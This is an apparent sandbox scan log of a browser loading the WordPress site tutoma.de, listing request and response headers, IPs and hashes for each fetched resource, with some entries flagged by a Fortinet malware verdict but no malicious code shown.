r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 1456357aecbd23f21ad98da57e0127eb
7074815b39fa8da9013883971d665e4c1b0797ea
f3eba265ee64870b2f822f1511b36c747d763c382557789cdad8be1d3b52d1f5
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "F3EBA265EE64870B2F822F1511B36C747D763C382557789CDAD8BE1D3B52D1F5"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6637
Expires: Thu, 24 Nov 2022 00:12:51 GMT
Date: Wed, 23 Nov 2022 22:22:14 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 770d09773b5f304acf141fd66a4862b4
5ddc46ab75de26c858a9a6f6d1beaaec9bb181f5
c7bcc6928fa1c0bb225ce8a2f6badd6cb1bd6ea002fb808ed34e8dafbd7b3b26
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4878
Cache-Control: max-age=135020
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:14 GMT
Etag: "637df674-1d7"
Expires: Fri, 25 Nov 2022 11:52:34 GMT
Last-Modified: Wed, 23 Nov 2022 10:31:16 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
firefox.settings.services.mozilla.com/v1/
34.102.187.140200 OK 939 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 567df7db606cf5d0871aa5bc9311b6da
4263faac7cbab2fcaf6661911dcad5091c06be17
e9650e1fdc46fc8678708ddcc37ab369c7a6d50489a004be896f20c7a3a644b0
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Backoff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Wed, 23 Nov 2022 22:17:12 GMT
cache-control: public,max-age=3600
content-type: application/json
age: 302
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 8a6c553d89cb6fd1de4787fee2a0e0dc
b974e022ea8675c0a09f58864cc99df05b5b1241
a62ecedcb0953814f982237818a3d902fdca501f82b675629d28b5d476e0fbfa
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "A62ECEDCB0953814F982237818A3D902FDCA501F82B675629D28B5D476E0FBFA"
Last-Modified: Mon, 21 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13706
Expires: Thu, 24 Nov 2022 02:10:40 GMT
Date: Wed, 23 Nov 2022 22:22:14 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
34.160.144.191200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 9ebddc2b260d081ebbefee47c037cb28
492bad62a7ca6a74738921ef5ae6f0be5edebf39
74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: nkvTzxD2dfDQjb7J20xJGRE03urvgII2dTUFBPuAuYLoC7LNCL5Wy+9j00+XSSLgaKaFjv/2uyo=
x-amz-request-id: 5TYBF3MY6EJAWG4H
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Wed, 23 Nov 2022 21:43:08 GMT
age: 2346
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
www.tutoma.de/
87.98.235.184301 Moved Permanently 0 B IP 87.98.235.184:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: www.tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
server: Apache
x-powered-by: PHP/7.0
x-redirect-by: WordPress
vary: Accept-Encoding
location: https://tutoma.de/
cache-control: max-age=0
expires: Wed, 23 Nov 2022 22:22:14 GMT
referrer-policy: no-referrer-when-downgrade
x-iplb-request-id: 5B5A2A9A:7C54_5762EBB8:0050_637E9D16_3532:1ABD1
x-iplb-instance: 18199
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
34.102.187.140200 OK 329 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Backoff, Pragma, Alert, Content-Type, ETag, Retry-After, Last-Modified, Content-Length, Cache-Control, Expires
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Wed, 23 Nov 2022 22:11:11 GMT
cache-control: public,max-age=3600
age: 664
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
content-type: application/json
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.249200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash b5fe536db29807b5c1a8a45342fc8985
0e53289c0b6584b23e407d6fd2507bb84180709f
936de84f89522de7579123a0f6b1963b1c007ceaf09b977e06f88988781f49e0
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "936DE84F89522DE7579123A0F6B1963B1C007CEAF09B977E06F88988781F49E0"
Last-Modified: Tue, 22 Nov 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21494
Expires: Thu, 24 Nov 2022 04:20:29 GMT
Date: Wed, 23 Nov 2022 22:22:15 GMT
Connection: keep-alive
tutoma.de/
87.98.235.184200 OK 53 kB IP 87.98.235.184:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (31046)
Hash 3384cd93863acdc81fa28e92072544c5
917cf5c426140970c8bed489b3de8b5449497a6b
b196bcf9d0d807c58e1fb0a0fa0e9a00c1a94f787af0e66a5f882ad54b3a7b88
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: text/html; charset=UTF-8
content-length: 52753
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Mon, 11 Nov 2019 17:12:35 GMT
accept-ranges: none
cache-control: max-age=0
expires: Wed, 23 Nov 2022 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
content-encoding: gzip
X-Firefox-Spdy: h2
tutoma.de/wp-content/cache/minify/c7035.js
87.98.235.184200 OK 34 kB URL HTTP/2 tutoma.de/wp-content/cache/minify/c7035.js
IP 87.98.235.184:0
File type ASCII text, with very long lines (65446)
Hash def93ec455a8b3e08466dadc49e136ba
819e4c64013af82911c460cf01716fa0caf145bd
8addbc96d1ad10759cc9d0349896d631b984f94e09c138256fe24392dbb682dd
Analyzer Verdict Alert fortinet Malware
GET /wp-content/cache/minify/c7035.js HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: application/x-javascript
content-length: 33707
server: Apache
vary: Accept-Encoding
last-modified: Sun, 26 Jun 2022 14:03:46 GMT
accept-ranges: none
cache-control: max-age=18546090
expires: Mon, 26 Jun 2023 14:03:46 GMT
referrer-policy: no-referrer-when-downgrade
content-encoding: gzip
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo.png
87.98.235.184200 OK 4.0 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo.png
IP 87.98.235.184:0
File type PNG image data, 260 x 53, 8-bit/color RGBA, non-interlaced\012- data
Hash 08ab7c9acb4dce28eeb913e426abf106
bb1ea2d24b527d3ae1926f46d0c21934816c9e50
54899ef3db8d756d1a1e6a64b242100a4f1fd904c0d60ed8ee6586e9bacc6b42
GET /wp-content/themes/tutoma/dist/images/tutoma-logo.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 3953
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 280 B IP 93.184.220.29:0
Hash fbd9db927efbfc1c3c3d97aa4a3cad25
4a43fa8251cc668940be76f56c5f151d44265c62
a0b3812fa80b40ccb80deed0bf3b41d60069fa317213d3aba8e7b0f27758bfde
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 3255
Cache-Control: max-age=152843
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Etag: "637e426b-118"
Expires: Fri, 25 Nov 2022 16:49:38 GMT
Last-Modified: Wed, 23 Nov 2022 15:55:23 GMT
Server: ECS (amb/6BBC)
X-Cache: HIT
Content-Length: 280
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash eb52164d651f5f45416e873aec29eb04
405b29bb7e7cd4367cf82988f8603e53db65f139
ed885e05db822ff30fe951e10b6d4f21e574d053939afca792992a1549a15301
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4064
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Last-Modified: Wed, 23 Nov 2022 21:14:31 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash fb4ee3082622f9f3340432290d63437e
852ca64934462e133e34043fca561aca215e6255
d4c2f665873baede94309128e276df6fdf7f0e1ec15699e75cd6bae2c24d556a
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 065495ec7a963a205abd9c8dbc75cb5d
ea416d0df4f6706150bda5da2077174f5cdd986b
1b2a2afee887651b23a849f14ace89b330329f6bf61c331545a3f6d12037aee5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
tutoma.de/wp-content/themes/tutoma/dist/images/home-image1.png
87.98.235.184200 OK 154 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/home-image1.png
IP 87.98.235.184:0
File type PNG image data, 689 x 630, 8-bit colormap, non-interlaced\012- data
Size 154 kB (154253 bytes)
Hash 819c79c11e82a3deff6c0c4007dac260
97a793eb2be7bfdbb7645ae9f5966a653e04d434
aa9da9a4e4f8501db1849c51a61f3247e79ad1f32c75c42e8dfcf52fb8b0ea80
GET /wp-content/themes/tutoma/dist/images/home-image1.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 154253
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:10 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/home-image3.png
87.98.235.184200 OK 175 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/home-image3.png
IP 87.98.235.184:0
File type PNG image data, 689 x 630, 8-bit colormap, non-interlaced\012- data
Size 175 kB (175335 bytes)
Hash 94de6f7a7ed55a2e32b8d46c0c039351
9c2539787198455bc52b53b0593247ccd5eafb5f
7250b0223f1321406dc6d9dd688b7ca8c9944b9144016fe570814a34b438d10e
GET /wp-content/themes/tutoma/dist/images/home-image3.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 175335
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:12 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/home-image2.png
87.98.235.184200 OK 147 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/home-image2.png
IP 87.98.235.184:0
File type PNG image data, 689 x 630, 8-bit colormap, non-interlaced\012- data
Size 147 kB (146963 bytes)
Hash 8a51a5ae5d41f72ad5fadbebcc88b633
ae8704aa2a66970dfffb3e9a620f8ec8ce559688
009c3106aa4801e987be7eefe947f4479d0c2a2dfbdecf8825b3e57391d611c4
GET /wp-content/themes/tutoma/dist/images/home-image2.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 146963
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:14 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo2.png
87.98.235.184200 OK 2.4 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo2.png
IP 87.98.235.184:0
File type PNG image data, 183 x 37, 8-bit/color RGBA, non-interlaced\012- data
Hash 264939e62bab6230273037bfdcc8c46e
be28c409cb598e64ab0315b9cfc6b53655225520
736e4932883554a6fbaa2d190400604532c9b191850476aea941a583324161ea
GET /wp-content/themes/tutoma/dist/images/tutoma-logo2.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2444
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-call.png
87.98.235.184200 OK 45 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-call.png
IP 87.98.235.184:0
File type PNG image data, 453 x 594, 8-bit colormap, non-interlaced\012- data
Hash 8a5a053bacb61360abce4b03b21c5915
31bfc01bbc348a8acb3e3407391152c60473959c
d9e81d6a174a8e9ebcf902ab8445fd2f417a2830f08fa35bb18736f079cc25c1
GET /wp-content/themes/tutoma/dist/images/tutoma-call.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 45447
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/help.png
87.98.235.184200 OK 2.9 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/help.png
IP 87.98.235.184:0
File type PNG image data, 91 x 78, 8-bit/color RGBA, non-interlaced\012- data
Hash bf7e54ed151e2a70e7118fff3d4c301c
d338ba2ccb5119de9ec68c21c8dabc6afe51625e
edb14fe13d44e9b2a7083e2b820e954a766bb2b8c32cc809e197ea83444cfdcf
GET /wp-content/uploads/2018/09/help.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2923
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:58 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/off.png
87.98.235.184200 OK 3.2 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/off.png
IP 87.98.235.184:0
File type PNG image data, 69 x 88, 8-bit/color RGBA, non-interlaced\012- data
Hash 415bfc94c936ffd1cb7c3e342e0b5006
abeb2eac35ebca9f133780214919c20682cdeabe
a254ec0ecd7eebdede1a255a16cdf2e5d132ffbd0790716f948cfa0db331c9f1
GET /wp-content/uploads/2018/09/off.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 3187
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:59 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/icon2.png
87.98.235.184200 OK 2.7 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/icon2.png
IP 87.98.235.184:0
File type PNG image data, 87 x 87, 8-bit/color RGBA, non-interlaced\012- data
Hash 763bf9c161ccd38766ce3d4a87c8ff44
9983baddc39fb43ffc1b750ac2cc68b6c59d231b
7be06021ea5d8e9b0990a26d16140f0ba95ef2649091fdfe8d6aad19c098b163
GET /wp-content/uploads/2018/09/icon2.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2693
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:41:00 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js
142.250.74.74200 OK 6.5 kB URL HTTP/2 ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js
IP 142.250.74.74:0
File type ASCII text, with very long lines (1190)
Hash c3bdf8c5d3c435f9a254e98df59a76d3
